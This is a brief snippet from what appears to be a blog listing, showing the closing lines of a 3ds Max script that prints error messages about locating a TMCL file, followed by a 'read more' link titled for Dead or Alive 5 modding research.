) else (Print "Failed to Locate TMCL")) else (Print "Aborted.")

Baca Selengkapnya... Maxsciprt for Doa5 research